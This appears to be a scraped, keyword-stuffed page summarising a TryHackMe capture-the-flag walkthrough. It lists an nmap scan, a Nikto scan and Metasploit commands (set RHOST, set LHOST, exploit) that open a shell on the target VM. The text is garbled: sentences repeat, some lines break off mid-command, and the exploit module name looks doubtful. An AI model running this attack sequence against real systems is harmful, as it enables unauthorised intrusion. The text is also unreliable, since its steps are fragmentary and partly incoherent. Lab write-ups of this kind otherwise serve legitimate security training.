Tryhackme Cct2019 May 2026
nikto -h <IP address of VM> The Nikto scan will reveal a potential vulnerability in the Apache version.
Once the open ports and services have been identified, participants must look for potential vulnerabilities. In this case, the web server is running a vulnerable version of Apache. Participants can use tools such as Nikto to scan the web server for vulnerabilities. tryhackme cct2019
nmap -sV <IP address of VM> The scan results will reveal open ports and services, including a web server running on port 80. nikto -h <IP address of VM> The Nikto
msfconsole use exploit/apache/mod_cgid_oob set RHOST <IP address of VM> set LHOST <IP address of your machine> exploit The exploit will provide a shell on the VM. nikto -h <